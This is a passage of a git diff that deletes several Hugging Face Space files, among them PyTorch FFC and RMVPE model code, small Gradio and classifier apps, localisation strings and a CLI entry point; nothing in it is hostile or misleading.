self.spatial_scale_factor is not None: - orig_size = x.shape[-2:] - x = F.interpolate(x, scale_factor=self.spatial_scale_factor, mode=self.spatial_scale_mode, align_corners=False) - - r_size = x.size() - # (batch, c, h, w/2+1, 2) - fft_dim = (-3, -2, -1) if self.ffc3d else (-2, -1) - ffted = torch.fft.rfftn(x, dim=fft_dim, norm=self.fft_norm) - ffted = torch.stack((ffted.real, ffted.imag), dim=-1) - ffted = ffted.permute(0, 1, 4, 2, 3).contiguous() # (batch, c, 2, h, w/2+1) - ffted = ffted.view((batch, -1,) + ffted.size()[3:]) - - if self.spectral_pos_encoding: - height, width = ffted.shape[-2:] - coords_vert = torch.linspace(0, 1, height)[None, None, :, None].expand(batch, 1, height, width).to(ffted) - coords_hor = torch.linspace(0, 1, width)[None, None, None, :].expand(batch, 1, height, width).to(ffted) - ffted = torch.cat((coords_vert, coords_hor, ffted), dim=1) - - if self.use_se: - ffted = self.se(ffted) - - ffted = self.conv_layer(ffted) # (batch, c*2, h, w/2+1) - ffted = self.relu(self.bn(ffted)) - - ffted = ffted.view((batch, -1, 2,) + ffted.size()[2:]).permute( - 0, 1, 3, 4, 2).contiguous() # (batch,c, t, h, w/2+1, 2) - ffted = torch.complex(ffted[..., 0], ffted[..., 1]) - - ifft_shape_slice = x.shape[-3:] if self.ffc3d else x.shape[-2:] - output = torch.fft.irfftn(ffted, s=ifft_shape_slice, dim=fft_dim, norm=self.fft_norm) - - if self.spatial_scale_factor is not None: - output = F.interpolate(output, size=orig_size, mode=self.spatial_scale_mode, align_corners=False) - - return output - - -class SpectralTransform(nn.Module): - - def __init__(self, in_channels, out_channels, stride=1, groups=1, enable_lfu=True, **fu_kwargs): - # bn_layer not used - super(SpectralTransform, self).__init__() - self.enable_lfu = enable_lfu - if stride == 2: - self.downsample = nn.AvgPool2d(kernel_size=(2, 2), stride=2) - else: - self.downsample = nn.Identity() - - self.stride = stride - self.conv1 = nn.Sequential( - nn.Conv2d(in_channels, out_channels // - 2, kernel_size=1, groups=groups, bias=False), - nn.BatchNorm2d(out_channels // 2), - nn.ReLU(inplace=True) - ) - self.fu = FourierUnit( - out_channels // 2, out_channels // 2, groups, **fu_kwargs) - if self.enable_lfu: - self.lfu = FourierUnit( - out_channels // 2, out_channels // 2, groups) - self.conv2 = torch.nn.Conv2d( - out_channels // 2, out_channels, kernel_size=1, groups=groups, bias=False) - - def forward(self, x): - - x = self.downsample(x) - x = self.conv1(x) - output = self.fu(x) - - if self.enable_lfu: - n, c, h, w = x.shape - split_no = 2 - split_s = h // split_no - xs = torch.cat(torch.split( - x[:, :c // 4], split_s, dim=-2), dim=1).contiguous() - xs = torch.cat(torch.split(xs, split_s, dim=-1), - dim=1).contiguous() - xs = self.lfu(xs) - xs = xs.repeat(1, 1, split_no, split_no).contiguous() - else: - xs = 0 - - output = self.conv2(x + output + xs) - - return output - - -class FFC(nn.Module): - - def __init__(self, in_channels, out_channels, kernel_size, - ratio_gin, ratio_gout, stride=1, padding=0, - dilation=1, groups=1, bias=False, enable_lfu=True, - padding_type='reflect', gated=False, **spectral_kwargs): - super(FFC, self).__init__() - - assert stride == 1 or stride == 2, "Stride should be 1 or 2." - self.stride = stride - - in_cg = int(in_channels * ratio_gin) - in_cl = in_channels - in_cg - out_cg = int(out_channels * ratio_gout) - out_cl = out_channels - out_cg - #groups_g = 1 if groups == 1 else int(groups * ratio_gout) - #groups_l = 1 if groups == 1 else groups - groups_g - - self.ratio_gin = ratio_gin - self.ratio_gout = ratio_gout - self.global_in_num = in_cg - - module = nn.Identity if in_cl == 0 or out_cl == 0 else nn.Conv2d - self.convl2l = module(in_cl, out_cl, kernel_size, - stride, padding, dilation, groups, bias, padding_mode=padding_type) - module = nn.Identity if in_cl == 0 or out_cg == 0 else nn.Conv2d - self.convl2g = module(in_cl, out_cg, kernel_size, - stride, padding, dilation, groups, bias, padding_mode=padding_type) - module = nn.Identity if in_cg == 0 or out_cl == 0 else nn.Conv2d - self.convg2l = module(in_cg, out_cl, kernel_size, - stride, padding, dilation, groups, bias, padding_mode=padding_type) - module = nn.Identity if in_cg == 0 or out_cg == 0 else SpectralTransform - self.convg2g = module( - in_cg, out_cg, stride, 1 if groups == 1 else groups // 2, enable_lfu, **spectral_kwargs) - - self.gated = gated - module = nn.Identity if in_cg == 0 or out_cl == 0 or not self.gated else nn.Conv2d - self.gate = module(in_channels, 2, 1) - - def forward(self, x): - x_l, x_g = x if type(x) is tuple else (x, 0) - out_xl, out_xg = 0, 0 - - if self.gated: - total_input_parts = [x_l] - if torch.is_tensor(x_g): - total_input_parts.append(x_g) - total_input = torch.cat(total_input_parts, dim=1) - - gates = torch.sigmoid(self.gate(total_input)) - g2l_gate, l2g_gate = gates.chunk(2, dim=1) - else: - g2l_gate, l2g_gate = 1, 1 - - if self.ratio_gout != 1: - out_xl = self.convl2l(x_l) + self.convg2l(x_g) * g2l_gate - if self.ratio_gout != 0: - out_xg = self.convl2g(x_l) * l2g_gate + self.convg2g(x_g) - - return out_xl, out_xg - - -class FFC_BN_ACT(nn.Module): - - def __init__(self, in_channels, out_channels, - kernel_size, ratio_gin, ratio_gout, - stride=1, padding=0, dilation=1, groups=1, bias=False, - norm_layer=nn.BatchNorm2d, activation_layer=nn.Identity, - padding_type='reflect', - enable_lfu=True, **kwargs): - super(FFC_BN_ACT, self).__init__() - self.ffc = FFC(in_channels, out_channels, kernel_size, - ratio_gin, ratio_gout, stride, padding, dilation, - groups, bias, enable_lfu, padding_type=padding_type, **kwargs) - lnorm = nn.Identity if ratio_gout == 1 else norm_layer - gnorm = nn.Identity if ratio_gout == 0 else norm_layer - global_channels = int(out_channels * ratio_gout) - self.bn_l = lnorm(out_channels - global_channels) - self.bn_g = gnorm(global_channels) - - lact = nn.Identity if ratio_gout == 1 else activation_layer - gact = nn.Identity if ratio_gout == 0 else activation_layer - self.act_l = lact(inplace=True) - self.act_g = gact(inplace=True) - - def forward(self, x): - x_l, x_g = self.ffc(x) - x_l = self.act_l(self.bn_l(x_l)) - x_g = self.act_g(self.bn_g(x_g)) - return x_l, x_g - - -class FFCResnetBlock(nn.Module): - def __init__(self, dim, padding_type, norm_layer, activation_layer=nn.ReLU, dilation=1, - spatial_transform_kwargs=None, inline=False, **conv_kwargs): - super().__init__() - self.conv1 = FFC_BN_ACT(dim, dim, kernel_size=3, padding=dilation, dilation=dilation, - norm_layer=norm_layer, - activation_layer=activation_layer, - padding_type=padding_type, - **conv_kwargs) - self.conv2 = FFC_BN_ACT(dim, dim, kernel_size=3, padding=dilation, dilation=dilation, - norm_layer=norm_layer, - activation_layer=activation_layer, - padding_type=padding_type, - **conv_kwargs) - if spatial_transform_kwargs is not None: - self.conv1 = LearnableSpatialTransformWrapper(self.conv1, **spatial_transform_kwargs) - self.conv2 = LearnableSpatialTransformWrapper(self.conv2, **spatial_transform_kwargs) - self.inline = inline - - def forward(self, x): - if self.inline: - x_l, x_g = x[:, :-self.conv1.ffc.global_in_num], x[:, -self.conv1.ffc.global_in_num:] - else: - x_l, x_g = x if type(x) is tuple else (x, 0) - - id_l, id_g = x_l, x_g - - x_l, x_g = self.conv1((x_l, x_g)) - x_l, x_g = self.conv2((x_l, x_g)) - - x_l, x_g = id_l + x_l, id_g + x_g - out = x_l, x_g - if self.inline: - out = torch.cat(out, dim=1) - return out - - -class ConcatTupleLayer(nn.Module): - def forward(self, x): - assert isinstance(x, tuple) - x_l, x_g = x - assert torch.is_tensor(x_l) or torch.is_tensor(x_g) - if not torch.is_tensor(x_g): - return x_l - return torch.cat(x, dim=1) - - -class FFCResNetGenerator(nn.Module): - def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=3, n_blocks=9, norm_layer=nn.BatchNorm2d, - padding_type='reflect', activation_layer=nn.ReLU, - up_norm_layer=nn.BatchNorm2d, up_activation=nn.ReLU(True), - init_conv_kwargs={}, downsample_conv_kwargs={}, resnet_conv_kwargs={}, - spatial_transform_layers=None, spatial_transform_kwargs={}, - add_out_act=True, max_features=1024, out_ffc=False, out_ffc_kwargs={}): - assert (n_blocks >= 0) - super().__init__() - - model = [nn.ReflectionPad2d(3), - FFC_BN_ACT(input_nc, ngf, kernel_size=7, padding=0, norm_layer=norm_layer, - activation_layer=activation_layer, **init_conv_kwargs)] - - ### downsample - for i in range(n_downsampling): - mult = 2 ** i - if i == n_downsampling - 1: - cur_conv_kwargs = dict(downsample_conv_kwargs) - cur_conv_kwargs['ratio_gout'] = resnet_conv_kwargs.get('ratio_gin', 0) - else: - cur_conv_kwargs = downsample_conv_kwargs - model += [FFC_BN_ACT(min(max_features, ngf * mult), - min(max_features, ngf * mult * 2), - kernel_size=3, stride=2, padding=1, - norm_layer=norm_layer, - activation_layer=activation_layer, - **cur_conv_kwargs)] - - mult = 2 ** n_downsampling - feats_num_bottleneck = min(max_features, ngf * mult) - - ### resnet blocks - for i in range(n_blocks): - cur_resblock = FFCResnetBlock(feats_num_bottleneck, padding_type=padding_type, activation_layer=activation_layer, - norm_layer=norm_layer, **resnet_conv_kwargs) - if spatial_transform_layers is not None and i in spatial_transform_layers: - cur_resblock = LearnableSpatialTransformWrapper(cur_resblock, **spatial_transform_kwargs) - model += [cur_resblock] - - model += [ConcatTupleLayer()] - - ### upsample - for i in range(n_downsampling): - mult = 2 ** (n_downsampling - i) - model += [nn.ConvTranspose2d(min(max_features, ngf * mult), - min(max_features, int(ngf * mult / 2)), - kernel_size=3, stride=2, padding=1, output_padding=1), - up_norm_layer(min(max_features, int(ngf * mult / 2))), - up_activation] - - if out_ffc: - model += [FFCResnetBlock(ngf, padding_type=padding_type, activation_layer=activation_layer, - norm_layer=norm_layer, inline=True, **out_ffc_kwargs)] - - model += [nn.ReflectionPad2d(3), - nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)] - if add_out_act: - model.append(get_activation('tanh' if add_out_act is True else add_out_act)) - self.model = nn.Sequential(*model) - - def forward(self, input): - return self.model(input) - - -class FFCNLayerDiscriminator(BaseDiscriminator): - def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, max_features=512, - init_conv_kwargs={}, conv_kwargs={}): - super().__init__() - self.n_layers = n_layers - - def _act_ctor(inplace=True): - return nn.LeakyReLU(negative_slope=0.2, inplace=inplace) - - kw = 3 - padw = int(np.ceil((kw-1.0)/2)) - sequence = [[FFC_BN_ACT(input_nc, ndf, kernel_size=kw, padding=padw, norm_layer=norm_layer, - activation_layer=_act_ctor, **init_conv_kwargs)]] - - nf = ndf - for n in range(1, n_layers): - nf_prev = nf - nf = min(nf * 2, max_features) - - cur_model = [ - FFC_BN_ACT(nf_prev, nf, - kernel_size=kw, stride=2, padding=padw, - norm_layer=norm_layer, - activation_layer=_act_ctor, - **conv_kwargs) - ] - sequence.append(cur_model) - - nf_prev = nf - nf = min(nf * 2, 512) - - cur_model = [ - FFC_BN_ACT(nf_prev, nf, - kernel_size=kw, stride=1, padding=padw, - norm_layer=norm_layer, - activation_layer=lambda *args, **kwargs: nn.LeakyReLU(*args, negative_slope=0.2, **kwargs), - **conv_kwargs), - ConcatTupleLayer() - ] - sequence.append(cur_model) - - sequence += [[nn.Conv2d(nf, 1, kernel_size=kw, stride=1, padding=padw)]] - - for n in range(len(sequence)): - setattr(self, 'model'+str(n), nn.Sequential(*sequence[n])) - - def get_all_activations(self, x): - res = [x] - for n in range(self.n_layers + 2): - model = getattr(self, 'model' + str(n)) - res.append(model(res[-1])) - return res[1:] - - def forward(self, x): - act = self.get_all_activations(x) - feats = [] - for out in act[:-1]: - if isinstance(out, tuple): - if torch.is_tensor(out[1]): - out = torch.cat(out, dim=1) - else: - out = out[0] - feats.append(out) - return act[-1], feats diff --git a/spaces/JUNGU/Talk2Carnegie/README.md b/spaces/JUNGU/Talk2Carnegie/README.md deleted file mode 100644 index 7903b155e84daf8ecc150f2c64f18aae360ff3ee..0000000000000000000000000000000000000000 --- a/spaces/JUNGU/Talk2Carnegie/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Talktosayno -emoji: 📉 -colorFrom: green -colorTo: pink -sdk: gradio -sdk_version: 3.34.0 -app_file: app.py -pinned: false -license: openrail -duplicated_from: JUNGU/talktosayno ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Jack-Ahan/fruit-vegetable-classifier/app.py b/spaces/Jack-Ahan/fruit-vegetable-classifier/app.py deleted file mode 100644 index 50b0c16e02bca3a872d3644621ebb1881281ff35..0000000000000000000000000000000000000000 --- a/spaces/Jack-Ahan/fruit-vegetable-classifier/app.py +++ /dev/null @@ -1,17 +0,0 @@ -from fastai.vision.all import * -import gradio as gr - -learn=load_learner("model.pkl") - -labels=learn.dls.vocab -def sample_predict(img): - print(img) - img = PILImage.create(img) - pred,pred_idx,probs=learn.predict(img) - return {labels[i]: float(probs[i]) for i in range(len(labels))} - -intf=gr.Interface(fn=sample_predict, - inputs=gr.components.Image(shape=(256, 256)), - outputs=gr.components.Label()) - -intf.launch() \ No newline at end of file diff --git a/spaces/Jamel887/Rvc-tio887/rmvpe.py b/spaces/Jamel887/Rvc-tio887/rmvpe.py deleted file mode 100644 index 3ad346141340e03bdbaa20121e1ed435bb3da57a..0000000000000000000000000000000000000000 --- a/spaces/Jamel887/Rvc-tio887/rmvpe.py +++ /dev/null @@ -1,432 +0,0 @@ -import sys, torch, numpy as np, traceback, pdb -import torch.nn as nn -from time import time as ttime -import torch.nn.functional as F - - -class BiGRU(nn.Module): - def __init__(self, input_features, hidden_features, num_layers): - super(BiGRU, self).__init__() - self.gru = nn.GRU( - input_features, - hidden_features, - num_layers=num_layers, - batch_first=True, - bidirectional=True, - ) - - def forward(self, x): - return self.gru(x)[0] - - -class ConvBlockRes(nn.Module): - def __init__(self, in_channels, out_channels, momentum=0.01): - super(ConvBlockRes, self).__init__() - self.conv = nn.Sequential( - nn.Conv2d( - in_channels=in_channels, - out_channels=out_channels, - kernel_size=(3, 3), - stride=(1, 1), - padding=(1, 1), - bias=False, - ), - nn.BatchNorm2d(out_channels, momentum=momentum), - nn.ReLU(), - nn.Conv2d( - in_channels=out_channels, - out_channels=out_channels, - kernel_size=(3, 3), - stride=(1, 1), - padding=(1, 1), - bias=False, - ), - nn.BatchNorm2d(out_channels, momentum=momentum), - nn.ReLU(), - ) - if in_channels != out_channels: - self.shortcut = nn.Conv2d(in_channels, out_channels, (1, 1)) - self.is_shortcut = True - else: - self.is_shortcut = False - - def forward(self, x): - if self.is_shortcut: - return self.conv(x) + self.shortcut(x) - else: - return self.conv(x) + x - - -class Encoder(nn.Module): - def __init__( - self, - in_channels, - in_size, - n_encoders, - kernel_size, - n_blocks, - out_channels=16, - momentum=0.01, - ): - super(Encoder, self).__init__() - self.n_encoders = n_encoders - self.bn = nn.BatchNorm2d(in_channels, momentum=momentum) - self.layers = nn.ModuleList() - self.latent_channels = [] - for i in range(self.n_encoders): - self.layers.append( - ResEncoderBlock( - in_channels, out_channels, kernel_size, n_blocks, momentum=momentum - ) - ) - self.latent_channels.append([out_channels, in_size]) - in_channels = out_channels - out_channels *= 2 - in_size //= 2 - self.out_size = in_size - self.out_channel = out_channels - - def forward(self, x): - concat_tensors = [] - x = self.bn(x) - for i in range(self.n_encoders): - _, x = self.layers[i](x) - concat_tensors.append(_) - return x, concat_tensors - - -class ResEncoderBlock(nn.Module): - def __init__( - self, in_channels, out_channels, kernel_size, n_blocks=1, momentum=0.01 - ): - super(ResEncoderBlock, self).__init__() - self.n_blocks = n_blocks - self.conv = nn.ModuleList() - self.conv.append(ConvBlockRes(in_channels, out_channels, momentum)) - for i in range(n_blocks - 1): - self.conv.append(ConvBlockRes(out_channels, out_channels, momentum)) - self.kernel_size = kernel_size - if self.kernel_size is not None: - self.pool = nn.AvgPool2d(kernel_size=kernel_size) - - def forward(self, x): - for i in range(self.n_blocks): - x = self.conv[i](x) - if self.kernel_size is not None: - return x, self.pool(x) - else: - return x - - -class Intermediate(nn.Module): # - def __init__(self, in_channels, out_channels, n_inters, n_blocks, momentum=0.01): - super(Intermediate, self).__init__() - self.n_inters = n_inters - self.layers = nn.ModuleList() - self.layers.append( - ResEncoderBlock(in_channels, out_channels, None, n_blocks, momentum) - ) - for i in range(self.n_inters - 1): - self.layers.append( - ResEncoderBlock(out_channels, out_channels, None, n_blocks, momentum) - ) - - def forward(self, x): - for i in range(self.n_inters): - x = self.layers[i](x) - return x - - -class ResDecoderBlock(nn.Module): - def __init__(self, in_channels, out_channels, stride, n_blocks=1, momentum=0.01): - super(ResDecoderBlock, self).__init__() - out_padding = (0, 1) if stride == (1, 2) else (1, 1) - self.n_blocks = n_blocks - self.conv1 = nn.Sequential( - nn.ConvTranspose2d( - in_channels=in_channels, - out_channels=out_channels, - kernel_size=(3, 3), - stride=stride, - padding=(1, 1), - output_padding=out_padding, - bias=False, - ), - nn.BatchNorm2d(out_channels, momentum=momentum), - nn.ReLU(), - ) - self.conv2 = nn.ModuleList() - self.conv2.append(ConvBlockRes(out_channels * 2, out_channels, momentum)) - for i in range(n_blocks - 1): - self.conv2.append(ConvBlockRes(out_channels, out_channels, momentum)) - - def forward(self, x, concat_tensor): - x = self.conv1(x) - x = torch.cat((x, concat_tensor), dim=1) - for i in range(self.n_blocks): - x = self.conv2[i](x) - return x - - -class Decoder(nn.Module): - def __init__(self, in_channels, n_decoders, stride, n_blocks, momentum=0.01): - super(Decoder, self).__init__() - self.layers = nn.ModuleList() - self.n_decoders = n_decoders - for i in range(self.n_decoders): - out_channels = in_channels // 2 - self.layers.append( - ResDecoderBlock(in_channels, out_channels, stride, n_blocks, momentum) - ) - in_channels = out_channels - - def forward(self, x, concat_tensors): - for i in range(self.n_decoders): - x = self.layers[i](x, concat_tensors[-1 - i]) - return x - - -class DeepUnet(nn.Module): - def __init__( - self, - kernel_size, - n_blocks, - en_de_layers=5, - inter_layers=4, - in_channels=1, - en_out_channels=16, - ): - super(DeepUnet, self).__init__() - self.encoder = Encoder( - in_channels, 128, en_de_layers, kernel_size, n_blocks, en_out_channels - ) - self.intermediate = Intermediate( - self.encoder.out_channel // 2, - self.encoder.out_channel, - inter_layers, - n_blocks, - ) - self.decoder = Decoder( - self.encoder.out_channel, en_de_layers, kernel_size, n_blocks - ) - - def forward(self, x): - x, concat_tensors = self.encoder(x) - x = self.intermediate(x) - x = self.decoder(x, concat_tensors) - return x - - -class E2E(nn.Module): - def __init__( - self, - n_blocks, - n_gru, - kernel_size, - en_de_layers=5, - inter_layers=4, - in_channels=1, - en_out_channels=16, - ): - super(E2E, self).__init__() - self.unet = DeepUnet( - kernel_size, - n_blocks, - en_de_layers, - inter_layers, - in_channels, - en_out_channels, - ) - self.cnn = nn.Conv2d(en_out_channels, 3, (3, 3), padding=(1, 1)) - if n_gru: - self.fc = nn.Sequential( - BiGRU(3 * 128, 256, n_gru), - nn.Linear(512, 360), - nn.Dropout(0.25), - nn.Sigmoid(), - ) - else: - self.fc = nn.Sequential( - nn.Linear(3 * N_MELS, N_CLASS), nn.Dropout(0.25), nn.Sigmoid() - ) - - def forward(self, mel): - mel = mel.transpose(-1, -2).unsqueeze(1) - x = self.cnn(self.unet(mel)).transpose(1, 2).flatten(-2) - x = self.fc(x) - return x - - -from librosa.filters import mel - - -class MelSpectrogram(torch.nn.Module): - def __init__( - self, - is_half, - n_mel_channels, - sampling_rate, - win_length, - hop_length, - n_fft=None, - mel_fmin=0, - mel_fmax=None, - clamp=1e-5, - ): - super().__init__() - n_fft = win_length if n_fft is None else n_fft - self.hann_window = {} - mel_basis = mel( - sr=sampling_rate, - n_fft=n_fft, - n_mels=n_mel_channels, - fmin=mel_fmin, - fmax=mel_fmax, - htk=True, - ) - mel_basis = torch.from_numpy(mel_basis).float() - self.register_buffer("mel_basis", mel_basis) - self.n_fft = win_length if n_fft is None else n_fft - self.hop_length = hop_length - self.win_length = win_length - self.sampling_rate = sampling_rate - self.n_mel_channels = n_mel_channels - self.clamp = clamp - self.is_half = is_half - - def forward(self, audio, keyshift=0, speed=1, center=True): - factor = 2 ** (keyshift / 12) - n_fft_new = int(np.round(self.n_fft * factor)) - win_length_new = int(np.round(self.win_length * factor)) - hop_length_new = int(np.round(self.hop_length * speed)) - keyshift_key = str(keyshift) + "_" + str(audio.device) - if keyshift_key not in self.hann_window: - self.hann_window[keyshift_key] = torch.hann_window(win_length_new).to( - audio.device - ) - fft = torch.stft( - audio, - n_fft=n_fft_new, - hop_length=hop_length_new, - win_length=win_length_new, - window=self.hann_window[keyshift_key], - center=center, - return_complex=True, - ) - magnitude = torch.sqrt(fft.real.pow(2) + fft.imag.pow(2)) - if keyshift != 0: - size = self.n_fft // 2 + 1 - resize = magnitude.size(1) - if resize < size: - magnitude = F.pad(magnitude, (0, 0, 0, size - resize)) - magnitude = magnitude[:, :size, :] * self.win_length / win_length_new - mel_output = torch.matmul(self.mel_basis, magnitude) - if self.is_half == True: - mel_output = mel_output.half() - log_mel_spec = torch.log(torch.clamp(mel_output, min=self.clamp)) - return log_mel_spec - - -class RMVPE: - def __init__(self, model_path, is_half, device=None): - self.resample_kernel = {} - model = E2E(4, 1, (2, 2)) - ckpt = torch.load(model_path, map_location="cpu") - model.load_state_dict(ckpt) - model.eval() - if is_half == True: - model = model.half() - self.model = model - self.resample_kernel = {} - self.is_half = is_half - if device is None: - device = "cuda" if torch.cuda.is_available() else "cpu" - self.device = device - self.mel_extractor = MelSpectrogram( - is_half, 128, 16000, 1024, 160, None, 30, 8000 - ).to(device) - self.model = self.model.to(device) - cents_mapping = 20 * np.arange(360) + 1997.3794084376191 - self.cents_mapping = np.pad(cents_mapping, (4, 4)) # 368 - - def mel2hidden(self, mel): - with torch.no_grad(): - n_frames = mel.shape[-1] - mel = F.pad( - mel, (0, 32 * ((n_frames - 1) // 32 + 1) - n_frames), mode="reflect" - ) - hidden = self.model(mel) - return hidden[:, :n_frames] - - def decode(self, hidden, thred=0.03): - cents_pred = self.to_local_average_cents(hidden, thred=thred) - f0 = 10 * (2 ** (cents_pred / 1200)) - f0[f0 == 10] = 0 - # f0 = np.array([10 * (2 ** (cent_pred / 1200)) if cent_pred else 0 for cent_pred in cents_pred]) - return f0 - - def infer_from_audio(self, audio, thred=0.03): - audio = torch.from_numpy(audio).float().to(self.device).unsqueeze(0) - # torch.cuda.synchronize() - # t0=ttime() - mel = self.mel_extractor(audio, center=True) - # torch.cuda.synchronize() - # t1=ttime() - hidden = self.mel2hidden(mel) - # torch.cuda.synchronize() - # t2=ttime() - hidden = hidden.squeeze(0).cpu().numpy() - if self.is_half == True: - hidden = hidden.astype("float32") - f0 = self.decode(hidden, thred=thred) - # torch.cuda.synchronize() - # t3=ttime() - # print("hmvpe:%s\t%s\t%s\t%s"%(t1-t0,t2-t1,t3-t2,t3-t0)) - return f0 - - def to_local_average_cents(self, salience, thred=0.05): - # t0 = ttime() - center = np.argmax(salience, axis=1) # 帧长#index - salience = np.pad(salience, ((0, 0), (4, 4))) # 帧长,368 - # t1 = ttime() - center += 4 - todo_salience = [] - todo_cents_mapping = [] - starts = center - 4 - ends = center + 5 - for idx in range(salience.shape[0]): - todo_salience.append(salience[:, starts[idx] : ends[idx]][idx]) - todo_cents_mapping.append(self.cents_mapping[starts[idx] : ends[idx]]) - # t2 = ttime() - todo_salience = np.array(todo_salience) # 帧长,9 - todo_cents_mapping = np.array(todo_cents_mapping) # 帧长,9 - product_sum = np.sum(todo_salience * todo_cents_mapping, 1) - weight_sum = np.sum(todo_salience, 1) # 帧长 - devided = product_sum / weight_sum # 帧长 - # t3 = ttime() - maxx = np.max(salience, axis=1) # 帧长 - devided[maxx <= thred] = 0 - # t4 = ttime() - # print("decode:%s\t%s\t%s\t%s" % (t1 - t0, t2 - t1, t3 - t2, t4 - t3)) - return devided - - -# if __name__ == '__main__': -# audio, sampling_rate = sf.read("卢本伟语录~1.wav") -# if len(audio.shape) > 1: -# audio = librosa.to_mono(audio.transpose(1, 0)) -# audio_bak = audio.copy() -# if sampling_rate != 16000: -# audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) -# model_path = "/bili-coeus/jupyter/jupyterhub-liujing04/vits_ch/test-RMVPE/weights/rmvpe_llc_half.pt" -# thred = 0.03 # 0.01 -# device = 'cuda' if torch.cuda.is_available() else 'cpu' -# rmvpe = RMVPE(model_path,is_half=False, device=device) -# t0=ttime() -# f0 = rmvpe.infer_from_audio(audio, thred=thred) -# f0 = rmvpe.infer_from_audio(audio, thred=thred) -# f0 = rmvpe.infer_from_audio(audio, thred=thred) -# f0 = rmvpe.infer_from_audio(audio, thred=thred) -# f0 = rmvpe.infer_from_audio(audio, thred=thred) -# t1=ttime() -# print(f0.shape,t1-t0) diff --git a/spaces/JeffJing/ZookChatBot/steamship/utils/utils.py b/spaces/JeffJing/ZookChatBot/steamship/utils/utils.py deleted file mode 100644 index 8f6cfdf1c9ad7089ae7fd7b19c195f353647cb2d..0000000000000000000000000000000000000000 --- a/spaces/JeffJing/ZookChatBot/steamship/utils/utils.py +++ /dev/null @@ -1,12 +0,0 @@ -from typing import Any, Dict, Optional - - -def safe_get(d: Dict, key: str, default: Any = None) -> Optional[Any]: - """Safely a value from dictionairy using a specific key""" - return d.get(key, default) or default - - -def format_uri(uri: Optional[str]) -> Optional[str]: - if uri is not None and not uri.endswith("/"): - uri += "/" - return uri diff --git a/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Hamster/con_hamster_logreg.py b/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Hamster/con_hamster_logreg.py deleted file mode 100644 index cbbfc8c7a5b52adbcfa23a1ce7cee8c9cc16f427..0000000000000000000000000000000000000000 --- a/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Hamster/con_hamster_logreg.py +++ /dev/null @@ -1,37 +0,0 @@ -import cv2 -import numpy as np -from PIL import Image -import pickle -import tensorflow as tf -import os - -class hamsterLogReg: - def __init__(self,url) -> None: - self.image = url - - def predict_image(self): - # Load the model - load_extractor = tf.keras.models.load_model("././Model/Hamster/resnetLogreg/resnet_EXTRACTOR.h5") - - modelpath = "././Model/Hamster/resnetLogreg/dataSaved.pkl" - - with open(modelpath, 'rb') as file: - saved_data = pickle.load(file) - animal_breed = saved_data['class_name'] - model = saved_data['logreg_model'] - - im = Image.open(self.image) - img = im.convert("RGB") - img= np.asarray(img) - image_resized= cv2.resize(img, (224,224)) - features = load_extractor.predict(np.expand_dims(image_resized, axis=0)) - - reshaped_features = features.reshape(features.shape[0],-1) - predicted_class = model.predict(reshaped_features) - pred_prob = model.predict_proba(reshaped_features)[:2] - prediction_probability = pred_prob[0][predicted_class[0]] - predicted_class - - output_class= animal_breed[predicted_class[0]] - - return [output_class, prediction_probability] diff --git a/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/javascript/localization.js b/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/javascript/localization.js deleted file mode 100644 index 2e9997ac154d0fee66c0e8e28a780a3bc54ef8b1..0000000000000000000000000000000000000000 --- a/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/javascript/localization.js +++ /dev/null @@ -1,67 +0,0 @@ - -// i18n - -const language = navigator.language.slice(0,2); - -const forView_i18n = { - 'zh': "仅供查看", - 'en': "For viewing only", - 'ja': "閲覧専用", - 'ko': "읽기 전용", - 'fr': "Pour consultation seulement", - 'es': "Solo para visualización", - 'sv': "Endast för visning", -}; - -const deleteConfirm_i18n_pref = { - 'zh': "你真的要删除 ", - 'en': "Are you sure you want to delete ", - 'ja': "本当に ", - 'ko': "정말로 ", - 'sv': "Är du säker på att du vill ta bort " -}; - -const deleteConfirm_i18n_suff = { - 'zh': " 吗?", - 'en': " ?", - 'ja': " を削除してもよろしいですか?", - 'ko': " 을(를) 삭제하시겠습니까?", - 'sv': " ?" -}; - -const usingLatest_i18n = { - 'zh': "您使用的就是最新版!", - 'en': "You are using the latest version!", - 'ja': "最新バージョンを使用しています!", - 'ko': "최신 버전을 사용하고 있습니다!", - 'sv': "Du använder den senaste versionen!" -}; - -const updatingMsg_i18n = { - 'zh': "正在尝试更新...", - 'en': "Trying to update...", - 'ja': "更新を試みています...", - 'ko': "업데이트를 시도 중...", - 'sv': "Försöker uppdatera..." -} - -const updateSuccess_i18n = { - 'zh': "更新成功,请重启本程序。", - 'en': "Updated successfully, please restart this program.", - 'ja': "更新が成功しました、このプログラムを再起動してください。", - 'ko': "업데이트 성공, 이 프로그램을 재시작 해주세요.", - 'sv': "Uppdaterat framgångsrikt, starta om programmet." -} - -const updateFailure_i18n = { - 'zh': '更新失败,请尝试手动更新。', - 'en': 'Update failed, please try manually updating.', - 'ja': '更新に失敗しました、手動での更新をお試しください。', - 'ko': '업데이트 실패, 수동 업데이트를 시도하십시오.', - 'sv': 'Uppdateringen misslyckades, prova att uppdatera manuellt.' -} - - -function i18n(msg) { - return msg.hasOwnProperty(language) ? msg[language] : msg['en']; -} diff --git a/spaces/KenjieDec/RemBG/rembg/cli.py b/spaces/KenjieDec/RemBG/rembg/cli.py deleted file mode 100644 index bd3ac2683424596eabe8a4ef5bb98658cc1d12ea..0000000000000000000000000000000000000000 --- a/spaces/KenjieDec/RemBG/rembg/cli.py +++ /dev/null @@ -1,14 +0,0 @@ -import click - -from . import _version -from .commands import command_functions - - -@click.group() -@click.version_option(version=_version.get_versions()["version"]) -def main() -> None: - pass - - -for command in command_functions: - main.add_command(command) diff --git a/spaces/Kevin676/AutoGPT/autogpt/config/ai_config.py b/spaces/Kevin676/AutoGPT/autogpt/config/ai_config.py deleted file mode 100644 index d50c30beee9dc8009f63415378ae1c6a399f0037..0000000000000000000000000000000000000000 --- a/spaces/Kevin676/AutoGPT/autogpt/config/ai_config.py +++ /dev/null @@ -1,121 